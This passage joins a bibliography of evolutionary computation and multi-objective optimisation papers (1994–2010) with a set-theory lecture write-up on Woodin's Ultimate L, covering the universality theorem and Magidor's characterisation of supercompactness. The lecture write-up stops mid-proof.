Evolutionary Computation, 2010 MODE-LD+SS: A novel Differential Evolution algorithm incorporating local dominance and scalar selection mechanisms for multi-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2010 An archiving strategy based on the Convex Hull of Individual Minima for MOEAs. Proceedings of the IEEE Congress on Evolutionary Computation, 2010 A painless gradient-assisted multi-objective memetic mechanism for solving continuous bi-objective optimization problems. Proceedings of the IEEE Congress on Evolutionary Computation, 2010 A hybrid Memory-based ACO algorithm for the QAP. Proceedings of the IEEE Congress on Evolutionary Computation, 2010 Two novel approaches for many-objective optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2010 An Alternative ACO <sub>\Bbb<i>R</i></sub>_{\Bbb{R}} Algorithm for Continuous Optimization Problems. Proceedings of the Swarm Intelligence - 7th International Conference, 2010 2009 Ranking Methods in Many-Objective Evolutionary Algorithms. Proceedings of the Nature-Inspired Algorithms for Optimisation, 2009 A Review of Particle Swarm Optimization Methods Used for Multimodal Optimization. Proceedings of the Innovations in Swarm Intelligence, 2009 Boundary Search for Constrained Numerical Optimization Problems With an Algorithm Inspired by the Ant Colony Metaphor. IEEE Trans. Evol. Comput., 2009 Design of a motorcycle frame using neuroacceleration strategies in MOEAs. J. Heuristics, 2009 Evolutionary multi-objective optimization: some current research trends and topics that remain to be explored. Frontiers Comput. Sci. China, 2009 g-dominance: Reference point based dominance for multiobjective metaheuristics. Eur. J. Oper. Res., 2009 Ranking Methods for Many-Objective Optimization. Proceedings of the MICAI 2009: Advances in Artificial Intelligence, 2009 A Particle Swarm Optimization Method for Multimodal Optimization Based on Electrostatic Interaction. Proceedings of the MICAI 2009: Advances in Artificial Intelligence, 2009 Solving Permutation Problems with Differential Evolution: An Application to the Jobshop Scheduling Problem. Proceedings of the Ninth International Conference on Intelligent Systems Design and Applications, 2009 Evolutionary continuation methods for optimization problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2009 Some techniques to deal with many-objective problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2009 Study of preference relations in many-objective optimization. Proceedings of the Genetic and Evolutionary Computation Conference, 2009 Limiting the velocity in particle swarm optimization using a geometric series. Proceedings of the Genetic and Evolutionary Computation Conference, 2009 Online Objective Reduction to Deal with Many-Objective Problems. Proceedings of the Evolutionary Multi-Criterion Optimization, 5th International Conference, 2009 Multi-Objective Particle Swarm Optimizers: An Experimental Comparison. Proceedings of the Evolutionary Multi-Criterion Optimization, 5th International Conference, 2009 SMPSO: A new PSO-based metaheuristic for multi-objective optimization. Proceedings of the 2009 IEEE Symposium on Computational Intelligence in Multi-Criteria Decision-Making, 2009 Tutorial: Metaheuristics for multiobjective optimization. Proceedings of the 2009 IEEE Symposium on Computational Intelligence in Multi-Criteria Decision-Making, 2009 A new proposal to hybridize the Nelder-Mead method to a differential evolution algorithm for constrained optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2009 Using gradient-based information to deal with scalability in multi-objective evolutionary algorithms. Proceedings of the IEEE Congress on Evolutionary Computation, 2009 Alternative Fitness Assignment Methods for Many-Objective Optimization Problems. Proceedings of the Artifical Evolution, 2009 2008 An Introduction to Multi-Objective Evolutionary Algorithms and Some of Their Potential Uses in Biology. Proceedings of the Applications of Computational Intelligence in Biology: Current Trends and Open Problems, 2008 Knowledge Incorporation in Multi-objective Evolutionary Algorithms. Proceedings of the Multi-Objective Evolutionary Algorithms for Knowledge Discovery from Databases, 2008 An Artificial Immune System Heuristic for Generating Short Addition Chains. IEEE Trans. Evol. Comput., 2008 Convergence of stochastic search algorithms to finite size pareto set approximations. J. Glob. Optim., 2008 Solving Engineering Optimization Problems with the Simple Constrained Particle Swarm Optimizer. Informatica (Slovenia), 2008 An empirical study about the usefulness of evolution strategies to solve constrained optimization problems. Int. J. Gen. Syst., 2008 Computing a Finite Size Representation of the Set of Approximate Solutions of an MOP CoRR, 2008 Solving Constrained Optimization using a T-Cell Artificial Immune System. Inteligencia Artif., 2008 Surrogate-based Multi-Objective Particle Swarm Optimization. Proceedings of the 2008 IEEE Swarm Intelligence Symposium, 2008 Approximate Solutions in Space Mission Design. Proceedings of the Parallel Problem Solving from Nature, 2008 Approximating the Knee of an MOP with Stochastic Search Algorithms. Proceedings of the Parallel Problem Solving from Nature, 2008 A Study of Convergence Speed in Multi-objective Metaheuristics. Proceedings of the Parallel Problem Solving from Nature, 2008 A Proposal to Hybridize Multi-Objective Evolutionary Algorithms with Non-gradient Mathematical Programming Techniques. Proceedings of the Parallel Problem Solving from Nature, 2008 On the Use of Projected Gradients for Constrained Multiobjective Optimization Problems. Proceedings of the Parallel Problem Solving from Nature, 2008 An Evolutionary Approach to Solve a Novel Mechatronic Multiobjective Optimization Problem. Proceedings of the Advances in Metaheuristics for Hard Optimization, 2008 Computing and Selecting ε-Efficient Solutions of {0, 1}-Knapsack Problems. Proceedings of the Multiple Criteria Decision Making for Sustainable Energy and Transportation Systems, 2008 Using a Gradient Based Method to Seed an EMO Algorithm. Proceedings of the Multiple Criteria Decision Making for Sustainable Energy and Transportation Systems, 2008 A new memetic strategy for the numerical treatment of multi-objective optimization problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2008 Computing finite size representations of the set of approximate solutions of an MOP with stochastic search algorithms. Proceedings of the Genetic and Evolutionary Computation Conference, 2008 Hybridizing surrogate techniques, rough sets and evolutionary algorithms to efficiently solve multi-objective optimization problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2008 Accelerating convergence using rough sets theory for multi-objective optimization problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2008 Hybridizing an evolutionary algorithm with mathematical programming techniques for multi-objective optimization. Proceedings of the Genetic and Evolutionary Computation Conference, 2008 Objective reduction using a feature selection technique. Proceedings of the Genetic and Evolutionary Computation Conference, 2008 Solving constrained multi-objective problems by objective space analysis. Proceedings of the Genetic and Evolutionary Computation Conference, 2008 Parallel Approaches for Multiobjective Optimization. Proceedings of the Multiobjective Optimization, 2008 Seeding the initial population of a multi-objective evolutionary algorithm using gradient-based information. Proceedings of the IEEE Congress on Evolutionary Computation, 2008 A comparative study of the effect of parameter scalability in multi-objective metaheuristics. Proceedings of the IEEE Congress on Evolutionary Computation, 2008 Auto-tuning fuzzy granulation for evolutionary optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2008 Constrained Optimization via Multiobjective Evolutionary Algorithms. Proceedings of the Multiobjective Problem Solving from Nature, 2008 2007 Evolutionary Algorithms: Basic Concepts and Applications in Biometrics. Proceedings of the Image Pattern Recognition - Synthesis and Analysis in Biometrics, 2007 A Study of Techniques to Improve the Efficiency of a Multi-Objective Particle Swarm Optimizer. Proceedings of the Evolutionary Computation in Dynamic and Uncertain Environments, 2007 A Preliminary Study of Fitness Inheritance in Evolutionary Constrained Optimization. Proceedings of the Nature Inspired Cooperative Strategies for Optimization (NICSO 2007), 2007 Hybrid Particle Swarm Optimizers in the Single Machine Scheduling Problem: An Experimental Study. Proceedings of the Evolutionary Scheduling, 2007 Comparative study of serial and parallel heuristics used to design combinational logic circuits. Optimization Methods and Software, 2007 Evolutionary multi-objective optimization. Eur. J. Oper. Res., 2007 Evol. Comput., 2007 MRMOGA: a new parallel multi-objective evolutionary algorithm based on the use of multiple resolutions. Concurr. Comput. Pract. Exp., 2007 Artificial Immune System for Solving Constrained Optimization Problems. Inteligencia Artif., 2007 A Memetic PSO Algorithm for Scalar Optimization Problems. Proceedings of the 2007 IEEE Swarm Intelligence Symposium, 2007 Approximating the <i>epsilon</i> -Efficient Set of an MOP with Stochastic Search Algorithms. Proceedings of the MICAI 2007: Advances in Artificial Intelligence, 2007 A Genetic Representation for Dynamic System Qualitative Models on Genetic Programming: A Gene Expression Programming Approach. Proceedings of the MICAI 2007: Advances in Artificial Intelligence, 2007 Handling Constraints in Particle Swarm Optimization Using a Small Population Size. Proceedings of the MICAI 2007: Advances in Artificial Intelligence, 2007 A Novel Model of Artificial Immune System for Solving Constrained Optimization Problems with Dynamic Tolerance Factor. Proceedings of the MICAI 2007: Advances in Artificial Intelligence, 2007 A Cultural Algorithm with Operator Parameters Control for Solving Timetabling Problems. Proceedings of the Foundations of Fuzzy Logic and Soft Computing, 2007 Optimization to Manage Supply Chain Disruptions Using the NSGA-II. Proceedings of the Theoretical Advances and Applications of Fuzzy Logic and Soft Computing, 2007 Convergence of stochastic search algorithms to gap-free pareto front approximations. Proceedings of the Genetic and Evolutionary Computation Conference, 2007 Alternative techniques to solve hard multi-objective optimization problems. Proceedings of the Genetic and Evolutionary Computation Conference, 2007 Epsilon-constraint with an efficient cultured differential evolution. Proceedings of the Genetic and Evolutionary Computation Conference, 2007 Use of Radial Basis Functions and Rough Sets for Evolutionary Multi-Objective Optimization. Proceedings of the IEEE Symposium on Computational Intelligence in Multicriteria Decision Making, 2007 An ant system with steps counter for the job shop scheduling problem. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 Applications of multi-objective evolutionary algorithms in economics and finance: A survey. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 A boundary search based ACO algorithm coupled with stochastic ranking. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 A bi-population PSO with a shake-mechanism for solving constrained numerical optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 Constraint handling techniques for a non-parametric real-valued estimation distribution algorithm. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 Evolutionary algorithms for solving multi-objective problems, Second Edition. Genetic and evolutionary computation series, Springer, ISBN: 978-0-387-33254-3, 2007 2006 Asymptotic convergence of metaheuristics for multiobjective optimization problems. Soft Comput., 2006 Asymptotic convergence of a simulated annealing algorithm for multiobjective optimization problems. Math. Methods Oper. Res., 2006 A New Proposal for Multiobjecive Optimization Using Particle Swarm Optimization and Rough Sets Theory. Proceedings of the Parallel Problem Solving from Nature, 2006 A Particle Swarm Optimizer for Constrained Numerical Optimization. Proceedings of the Parallel Problem Solving from Nature, 2006 Solving Hard Multiobjective Optimization Problems Using <i>epsilon</i>-Constraint with Cultured Differential Evolution. Proceedings of the Parallel Problem Solving from Nature, 2006 A Multi-objective Particle Swarm Optimizer Hybridized with Scatter Search. Proceedings of the MICAI 2006: Advances in Artificial Intelligence, 2006 Dynamic fitness inheritance proportion for multi-objective particle swarm optimization. Proceedings of the Genetic and Evolutionary Computation Conference, 2006 A comparative study of differential evolution variants for global optimization. Proceedings of the Genetic and Evolutionary Computation Conference, 2006 A new proposal for multi-objective optimization using differential evolution and rough sets theory. Proceedings of the Genetic and Evolutionary Computation Conference, 2006 EMOPSO: A Multi-Objective Particle Swarm Optimizer with Emphasis on Efficiency. Proceedings of the Evolutionary Multi-Criterion Optimization, 4th International Conference, 2006 Modified Differential Evolution for Constrained Optimization. Proceedings of the IEEE International Conference on Evolutionary Computation, 2006 Boundary Search for Constrained Numerical Optimization Problems in ACO Algorithms. Proceedings of the Ant Colony Optimization and Swarm Intelligence, 2006 2005 A simple multimembered evolution strategy to solve constrained optimization problems. IEEE Trans. Evol. Comput., 2005 Extraction and reuse of design patterns from genetic algorithms using case-based reasoning. Soft Comput., 2005 Solving Multiobjective Optimization Problems Using an Artificial Immune System. Genet. Program. Evolvable Mach., 2005 A proposal to use stripes to maintain diversity in a multi-objective particle swarm optimizer. Proceedings of the 2005 IEEE Swarm Intelligence Symposium, 2005 Fitness inheritance in multi-objective particle swarm optimization. Proceedings of the 2005 IEEE Swarm Intelligence Symposium, 2005 Coevolutionary Multi-objective Optimization Using Clustering Techniques. Proceedings of the MICAI 2005: Advances in Artificial Intelligence, 2005 Useful Infeasible Solutions in Engineering Optimization with Evolutionary Algorithms. Proceedings of the MICAI 2005: Advances in Artificial Intelligence, 2005 An Introduction to Evolutionary Algorithms and Their Applications. Proceedings of the Advanced Distributed Systems: 5th International School and Symposium, 2005 Handling Constraints in Global Optimization Using an Artificial Immune System. Proceedings of the Artificial Immune Systems: 4th International Conference, 2005 Evolutionary Multi-Objective Optimization: Current State and Future Challenges. Proceedings of the 5th International Conference on Hybrid Intelligent Systems (HIS 2005), 2005 Promising infeasibility and multiple offspring incorporated to differential evolution for constrained optimization. Proceedings of the Genetic and Evolutionary Computation Conference, 2005 Use of domain information to improve the performance of an evolutionary algorithm. Proceedings of the Genetic and Evolutionary Computation Conference, 2005 Optimization with constraints using a cultured differential evolution approach. Proceedings of the Genetic and Evolutionary Computation Conference, 2005 Asymptotic Convergence of Some Metaheuristics Used for Multiobjective Optimization. Proceedings of the Foundations of Genetic Algorithms, 8th International Workshop, 2005 Saving Evaluations in Differential Evolution for Constrained Optimization. Proceedings of the Sixth Mexican International Conference on Computer Science (ENC 2005), 2005 Improving PSO-Based Multi-objective Optimization Using Crowding, Mutation and epsilon-Dominance. Proceedings of the Evolutionary Multi-Criterion Optimization, 2005 Current Status of the EMOO Repository, Including Current and Future Research Trends. Proceedings of the Practical Approaches to Multi-Objective Optimization, 2005 Finding Optimal Addition Chains Using a Genetic Algorithm Approach. Proceedings of the Computational Intelligence and Security, International Conference, 2005 A study of fitness inheritance and approximation techniques for multi-objective particle swarm optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2005 Identifying on-line behavior and some sources of difficulty in two competitive approaches for constrained optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2005 MRMOGA: parallel evolutionary multiobjective optimization using multiple resolutions. Proceedings of the IEEE Congress on Evolutionary Computation, 2005 Use of Multiobjective Optimization Concepts to Handle Constraints in Genetic Algorithms. Proceedings of the Evolutionary Multiobjective Optimization, 2005 Recent Trends in Evolutionary Multiobjective Optimization. Proceedings of the Evolutionary Multiobjective Optimization, 2005 2004 Handling Multiple Objectives With Particle Swarm Optimization. IEEE Trans. Evol. Comput., 2004 Simple Feasibility Rules and Differential Evolution for Constrained Optimization. Proceedings of the MICAI 2004: Advances in Artificial Intelligence, 2004 A Study of the Parallelization of a Coevolutionary Multi-objective Evolutionary Algorithm. Proceedings of the MICAI 2004: Advances in Artificial Intelligence, 2004 Convergence Analysis of a Multiobjective Artificial Immune System Algorithm. Proceedings of the Artificial Immune Systems, Third International Conference, 2004 Particle Swarm Optimization in Non-stationary Environments. Proceedings of the Advances in Artificial Intelligence, 2004 On the Optimal Computaion of Finite Field Exponentiation. Proceedings of the Advances in Artificial Intelligence, 2004 A Cultural Algorithm with Differential Evolution to Solve Constrained Optimization Problems. Proceedings of the Advances in Artificial Intelligence, 2004 Using Clustering Techniques to Improve the Performance of a Multi-objective Particle Swarm Optimizer. Proceedings of the Genetic and Evolutionary Computation, 2004 An Improved Diversity Mechanism for Solving Constrained Optimization Problems Using a Multimembered Evolution Strategy. Proceedings of the Genetic and Evolutionary Computation, 2004 Reusing Code in Genetic Programming. Proceedings of the Genetic Programming, 7th European Conference, 2004 Culturizing Differential Evolution for Constrained Optimization. Proceedings of the 5th Mexican International Conference on Computer Science (ENC 2004), 2004 On the Use of a Population-Based Particle Swarm Optimizer to Design Combinational Logic Circuits. Proceedings of the 6th NASA / DoD Workshop on Evolvable Hardware (EH 2004), 2004 A Comparative Study of Encodings to Design Combinational Logic Circuits Using Particle Swarm Optimization. Proceedings of the 6th NASA / DoD Workshop on Evolvable Hardware (EH 2004), 2004 Evolutionary Multiobjective Design targeting a Field Programmable Transistor Array. Proceedings of the 6th NASA / DoD Workshop on Evolvable Hardware (EH 2004), 2004 A constraint-handling mechanism for particle swarm optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2004 PASSSS: an implementation of a novel diversity strategy for handling constraints. Proceedings of the IEEE Congress on Evolutionary Computation, 2004 Mutual information-based fitness functions for evolutionary circuit synthesis. Proceedings of the IEEE Congress on Evolutionary Computation, 2004 2003 Guest editorial: special issue on evolutionary multiobjective optimization. IEEE Trans. Evol. Comput., 2003 Evolutionary Synthesis of Logic Circuits Using Information Theory. Artif. Intell. Rev., 2003 Evolutionary multiobjective optimization using a cultural algorithm. Proceedings of the 2003 IEEE Swarm Intelligence Symposium, 2003 Engineering Optimization Using a Simple Evolutionary Algorithm. Proceedings of the 15th IEEE International Conference on Tools with Artificial Intelligence (ICTAI 2003), 2003 Use of Particle Swarm Optimization to Design Combinational Logic Circuits. Proceedings of the Evolvable Systems: From Biology to Hardware, 2003 Synthesis of Boolean Functions Using Information Theory. Proceedings of the Evolvable Systems: From Biology to Hardware, 2003 Use of an Artificial Immune System for Job Shop Scheduling. Proceedings of the Artificial Immune Systems, Second International Conference, 2003 A Simple Evolution Strategy to Solve Constrained Optimization Problems. Proceedings of the Genetic and Evolutionary Computation, 2003 Multiobjective Optimization Using Ideas from the Clonal Selection Principle. Proceedings of the Genetic and Evolutionary Computation, 2003 Use of Multiobjective Optimization Concepts to Handle Constraints in Single-Objective Optimization. Proceedings of the Genetic and Evolutionary Computation, 2003 Multiobjective-Based Concepts to Handle Constraints in Evolutionary Algorithms. Proceedings of the 4th Mexican International Conference on Computer Science (ENC 2003), 2003 IS-PAES: Evolutionary Multi-Objective Optimization with Constraint Handling. Proceedings of the 4th Mexican International Conference on Computer Science (ENC 2003), 2003 Gate-level Synthesis of Boolean Functions using Information Theory Concepts. Proceedings of the 4th Mexican International Conference on Computer Science (ENC 2003), 2003 The Micro Genetic Algorithm 2: Towards Online Adaptation in Evolutionary Multiobjective Optimization. Proceedings of the Evolutionary Multi-Criterion Optimization, 2003 IS-PAES: A Constraint-Handling Technique Based on Multiobjective Optimization Concepts. Proceedings of the Evolutionary Multi-Criterion Optimization, 2003 Comparing Different Serial and Parallel Heuristics to Design Combinational Logic Circuits. Proceedings of the 5th NASA / DoD Workshop on Evolvable Hardware (EH 2003), 2003 Fitness Landscape and Evolutionary Boolean Synthesis using Information. Proceedings of the 5th NASA / DoD Workshop on Evolvable Hardware (EH 2003), 2003 Adding a diversity mechanism to a simple evolution strategy to solve constrained optimization problems. Proceedings of the IEEE Congress on Evolutionary Computation, CEC 2003, 8, 2003 A coevolutionary multi-objective evolutionary algorithm. Proceedings of the IEEE Congress on Evolutionary Computation, CEC 2003, 8, 2003 2002 Design of combinational logic circuits through an evolutionary multiobjective optimization approach. AI EDAM, 2002 Constraint-handling in genetic algorithms through the use of dominance-based tournament selection. Robust Multiscale Affine 2D-Image Registration through Evolutionary Strategies. Proceedings of the Parallel Problem Solving from Nature, 2002 Genetic Algorithms and Case-Based Reasoning as a Discovery and Learning Machine in the Optimization of Combinational Logic Circuits. Proceedings of the MICAI 2002: Advances in Artificial Intelligence, 2002 A Cultural Algorithm for Constrained Optimization. Proceedings of the MICAI 2002: Advances in Artificial Intelligence, 2002 Efficient Affine 2D-image Registration Using Evolutionary Strategies. Proceedings of the GECCO 2002: Proceedings of the Genetic and Evolutionary Computation Conference, 2002 Adding Knowledge And Efficient Data Structures To Evolutionary Programming: A Cultural Algorithm For Constrained Optimization. Proceedings of the GECCO 2002: Proceedings of the Genetic and Evolutionary Computation Conference, 2002 Evolutionary algorithms for solving multi-objective problems. Genetic algorithms and evolutionary computation 5, Kluwer, ISBN: 978-1-4757-5184-0, 2002 2001 Extraction of Design Patterns from Evolutionary Algorithms Using Case-Based Reasoning. Proceedings of the Evolvable Systems: From Biology to Hardware, 2001 GA-Based Learning of kDNF<sub>n</sub><sup>s</sup> Boolean Formulas. Proceedings of the Evolvable Systems: From Biology to Hardware, 2001 A Micro-Genetic Algorithm for Multiobjective Optimization. Proceedings of the Evolutionary Multi-Criterion Optimization, 2001 A Short Tutorial on Evolutionary Multiobjective Optimization. Proceedings of the Evolutionary Multi-Criterion Optimization, 2001 On Learning kDNF<sup>s</sup><sub>n</sub> Boolean Formulas. Proceedings of the 3rd NASA / DoD Workshop on Evolvable Hardware (EH 2001), 2001 2000 An updated survey of GA-based multiobjective optimization techniques. ACM Comput. Surv., 2000 Towards automated evolutionary design of combinational circuits. Comput. Electr. Eng., 2000 Ant Colony System for the Design of Combinational Logic Circuits. Proceedings of the Evolvable Systems: From Biology to Hardware, 2000 Evolutionary Multiobjective Design of Combinational Logic Circuits. Proceedings of the 2nd NASA / DoD Workshop on Evolvable Hardware (EH 2000), 2000 1999 A Comprehensive Survey of Evolutionary-Based Multiobjective Optimization Techniques. Knowl. Inf. Syst., 1999 A Genetic Programming Approach to Logic Function Synthesis by Means of Multiplexers. Proceedings of the 1st NASA / DoD Workshop on Evolvable Hardware (EH '99), 1999 1998 Using a new GA-based multiobjective optimization technique for the design of robot arms. Robotica, 1998 Using the Min-Max Method to Solve Multiobjective Optimization Problems with Genetic Algorithms. Proceedings of the Progress in Artificial Intelligence, 1998 1997 Automated Design of Combinational Logic Circuits by Genetic Algorithms. Proceedings of the International Conference on Artificial Neural Nets and Genetic Algorithms, 1997 1996 Automated design of part feeders using a genetic algorithm. Proceedings of the 1996 IEEE International Conference on Robotics and Automation, 1996 1995 Multiobjective design optimization of counterweight balancing of a robot arm using genetic algorithms. Proceedings of the Seventh International Conference on Tools with Artificial Intelligence, 1995 Using Genetic Algorithms for Optimal Design of Axially Loaded Non-Prismatic Columns. Proceedings of the Artificial Neural Nets and Genetic Algorithms, 1995 1994 Using Genetic Algorithms for Optimal Design of Trusses. Proceedings of the Sixth International Conference on Tools with Artificial Intelligence, 1994
## Luminy – Hugh Woodin: Ultimate L (II) For the first lecture, see here. II In this lecture, we prove: Universality Theorem. If $N$ is a weak extender model for $\mbox{}\delta$ is supercompact’, and $\pi:N\cap V_{\gamma+1}\to N\cap V_{\pi(\gamma)+1}$ is elementary with ${\rm cp}(\pi)\ge\delta$, then $\pi\in N$. As mentioned before, this gives us that $N$ absorbs a significant amount of strength from $V$. For example: Lemma. Suppose that $\kappa$ is 2-huge. Then, for each $A\subseteq V_\kappa,$ $(V_\kappa,\in,A)\models$There is a proper class of huge cardinals witnessed by embeddings that cohere $A$. $\Box$ Hence, if $A=N\cap V_\kappa$ and $\kappa>\delta$, then $N\cap V_\kappa\models$There is a proper class of huge cardinals. Here, coherence means the following: $j:V\to M$ coheres a set $A$ iff, letting $\gamma={\rm cp}(j)$, we have $V_{j(j(\gamma))+\omega}\subseteq M$ and $j(A)\cap V_{j(j(\gamma))+\omega}=A\cap V_{j(j(\gamma))+\omega}$. Actually, we need much less. We need something like $j''j(\gamma)\in M$ and for hugeness, $V_{j(j(\gamma))+1}\subseteq M$ already suffices. This methodology breaks down past $\omega$-hugeness. Then we need to change the notion of coherence, since (for example, beginning with $j:L(V_\lambda)\to L(V_\lambda)$) to have $\pi:N\cap V_{\lambda+1}\to N\cap V_{\pi(\lambda)+1}$ is no longer a reasonable condition. But suitable modifications still work at this very high level. The proof of the universality theorem builds on a reformulation of supercompactness in terms of extenders, due to Magidor: Theorem (Magidor). The following are equivalent: 1. $\delta$ is supercompact. 2. For all $\gamma>\delta$ and all $a\in V_\gamma$, there are $\bar\delta<\bar\gamma<\delta$ and $\bar a\in V_{\bar\gamma}$, and an elementary $\pi:V_{\bar\gamma+1}\to V_{\gamma+1}$ such that: 1. $\bar\delta={\rm cp}(\pi)$ and $\pi(\bar\delta)=\delta$. 2. $\pi(\bar\gamma)=\gamma$ and $\pi(\bar a)=a$. The proof is actually a straightforward reflection argument. Proof. $(1.\Rightarrow 2.)$ Suppose that item 2. fails, as witnessed by $\gamma,a$. Pick a normal fine ${\mathcal U}$ on ${\mathcal P}_\delta(\lambda)$ where $\lambda=|V_{\gamma+1}|$, and consider $j:V\to M\cong V^{{\mathcal P}_\delta(\lambda)}/{\mathcal U}$. Then ${\rm cp}(j)=\delta$, $j(\delta)>\lambda$, and ${}^\lambda M\subseteq M$. But then ${}^{V_{\gamma+1}}M\subseteq M$, and, by elementarity, $j(\gamma),j(a)$ are counterexamples to item 2. in $M$ with respect to $j(\delta)$. However, $j\upharpoonright V_{\gamma+1}\in M$, and it witnesses item 2. in $M$ for $j(\gamma),j(a)$ with respect to $j(\delta)$. Contradiction. $(2.\Rightarrow 1.)$ Assume item 2. For any $\lambda>\delta$ we need to find a normal fine ${\mathcal U}$ on ${\mathcal P}_\delta(\lambda)$. Fix $\lambda$, and let $\gamma=\lambda+\omega$ and $a=\lambda$. Let $\pi:V_{\bar\gamma+1}\to V_{\gamma+1}$ be an embedding as in item 2. for $\gamma,a$. Use $\pi$ to define a normal fine $\bar{\mathcal U}$ on ${\mathcal P}_{\bar\delta}(\bar\lambda)$ by $A\in\bar{\mathcal U}$ iff $\pi''\bar\lambda\in\pi(A)$. Note that $\pi''\bar\lambda\in V_{\lambda+1}\in V_{\gamma+1}$, so this definition makes sense. Further, ${\mathcal P}({\mathcal P}_{\bar\delta}(\bar\lambda))\in V_{\bar\lambda+2}\in V_{\bar\delta+1}$, so $\bar{\mathcal U}\in V_{\bar\gamma+1}$. Hence, $\bar{\mathcal U}$ is in the domain of $\pi$, and $\pi(\bar{\mathcal U})={\mathcal U}$ is as wanted. $\Box$ As mentioned in the previous lecture, it was expected for a while that Magidor’s reformulation would be the key to the construction of inner models for supercompactness, since it suggests which extenders need to be put in their sequence. Recent results indicate now that the construction should instead proceed directly with extenders derived from the normal fine measures. However, Magidor’s reformulation is very useful for the theory of weak extender models, thanks to the following fact, that can be seen as a strengthening of this reformulation: Lemma. Suppose $N$ is a weak extender model for $\delta$ is supercompact’. Suppose $\gamma>\delta$ and $a\in V_\gamma$. Then there are $\bar \delta,\bar a,\bar\gamma$ in $V_{\delta}$ and an elementary $\pi:V_{\bar\gamma+1}\to V_{\gamma+1}$ such that: 1. ${\rm cp}(\pi)=\bar\delta$, $\pi(\bar\delta)=\delta$, $\pi(\bar\gamma)=\gamma$, and $\pi(\bar a)=a$. 2. $\pi(N\cap V_{\bar\gamma})=N\cap V_\gamma$. 3. $\pi\upharpoonright(N\cap V_{\bar\gamma+1})\in N$. Again, the proof is a reflection argument as in Magidor’s theorem, but we need to work harder to ensure  items 2. and 3. The key is: Claim. Suppose $\lambda>\delta$. Then there is a normal fine ${\mathcal U}$ on ${\mathcal P}_\delta(V_\lambda)$ such that $\{x\in{\mathcal P}_\delta(V_\lambda)\mid$ The transitive collapse of $X\cap N$  is $N\cap V_{\bar\lambda}$, where $\bar\lambda$ is the transitive collapse of $X\cap\lambda\}\in{\mathcal U}$. Proof. We may assume that ${}|V_\lambda|=\lambda$ and that this also holds in $N$. In $N$, pick a bijection $\rho$ between $\lambda$ and $N\cap V_\lambda$, and find ${\mathcal U}^*$ on ${\mathcal P}_\delta(\lambda)$ with ${\mathcal U}^*\cap N\in N$ and ${\mathcal P}_\delta(\lambda)\cap N\in{\mathcal U}^*$. It is enough to check $(*)$ $\{X\subseteq\lambda\mid$ The transitive collapse of $\rho[X]$ is a rank initial segment of $N\}\in{\mathcal U}^*$. Once we have $(*)$, it is easy to use the bijection between $\lambda$ and $V_\lambda$ to obtain the desired measure ${\mathcal U}$. To prove $(*)$, work in $N$, and note that the result is now trivial since, letting $j$ be the ultrapower embedding induced by the restriction of ${\mathcal U}^*$ to $N$, we have that $j''V_\lambda$ collapses to $V_\lambda$, which is an initial segment of $V$. $\Box$ Proof of the lemma. The argument is now a straightforward elaboration of the proof of Magidor’s theorem, using the claim just established. Namely, in the proof of $(1.\Rightarrow2.)$ of the Theorem, use an ultrafilter ${\mathcal U}$ as in the claim. We need to see that (the restriction to $V_{\gamma+1}$ of) the ultrapower embedding $j$ satisfies $j(N\cap V_{\bar\gamma})=N\cap V_\gamma$. We begin with $\lambda$ much larger than $\gamma$ such that $\lambda=|V_\lambda|$, and fix sets $A,B\in N\cap{\mathcal P}(\lambda)$ such that $|A|=|B|=\lambda$, and a bijection $\rho:\lambda\to V_\lambda$ such that $\rho\upharpoonright A$ is a bijection between $A$ and $N\cap V_\lambda$ and $\rho\upharpoonright A\in N$. We use $\rho$ to transfer ${\mathcal U}$ to a measure ${\mathcal U}^*$ on ${\mathcal P}_\delta(A)$ concentrating on $N$. Now let $j:V\to M\cong V^{{\mathcal P}_\delta(A)}/{\mathcal U}^*$ be the ultrapower embedding. We need to check that $j(N)\cap V_\lambda=N\cap V_\lambda$. The issue is that, in principle, $j(N)\cap V_\lambda$ could overspill and be larger. However, since ${\mathcal U}^*$ concentrates on $N$, this is not possible, because transitive collapses are computed the same way in $M$, $N$, and $V$, even though $(N^{{\mathcal P}_\delta(A)}/{\mathcal U}^*)^N$ may differ from $(N^{{\mathcal P}_\delta(A)}/{\mathcal U}^*)^V$. $\Box$ We are ready for the main result of this lecture. Proof of the Universality Theorem. We will actually prove that for all cardinals $\gamma>\delta$, if $\pi:(H(\gamma^+))^N\to(H(\pi(\gamma)^+))^N$ is elementary, and ${\rm cp}(\pi)\ge\delta$, then $\pi\in N$. This gives the result as stated, through some coding. Choose $\lambda$ much larger than $\gamma$, and let $a=(\pi,\gamma)$. Apply the strengthened Magidor reformulation, to obtain $\bar a=(\bar\pi,\bar\gamma)$, $\bar\lambda$ and $\bar\delta$, and an embedding $\sigma:V_{\bar\lambda+1}\to V_{\lambda+1}$ with ${\rm cp}(\sigma)=\bar\delta$, $\sigma(\bar\delta)=\delta$, $\sigma(\bar\pi)=\pi$, and $\sigma(\bar\gamma)=\gamma$. Note that $\bar\pi: H(\bar\gamma^+)^N\to H(\bar \pi(\bar \gamma)^+)^N$. It is enough to show that $\bar\pi\in N$, since $\sigma\upharpoonright (V_{\bar\lambda+1}\cap N)\in N$, and so $\pi=\sigma(\bar\pi)\in N$ as well. For this, we actually only need to show that $\bar\pi\upharpoonright({\mathcal P}(\bar\gamma)\cap N)\in N$, since the fragment $\pi\upharpoonright({\mathcal P}(\gamma)\cap N)$ of $\pi$ determines $\pi$ completely. The advantage, of course, is that it is easier to analyze sets of ordinals. Let $a\subseteq\bar\gamma$ with $a \in N$, and let $\alpha\in\pi(\bar\gamma)$. We need to compute in $N$ whether $\alpha\in\bar\pi(a)$. For this, note that $\alpha\in\bar\pi(a)$ iff $\sigma(\alpha)\in\sigma(\bar\pi(a))$. Now, 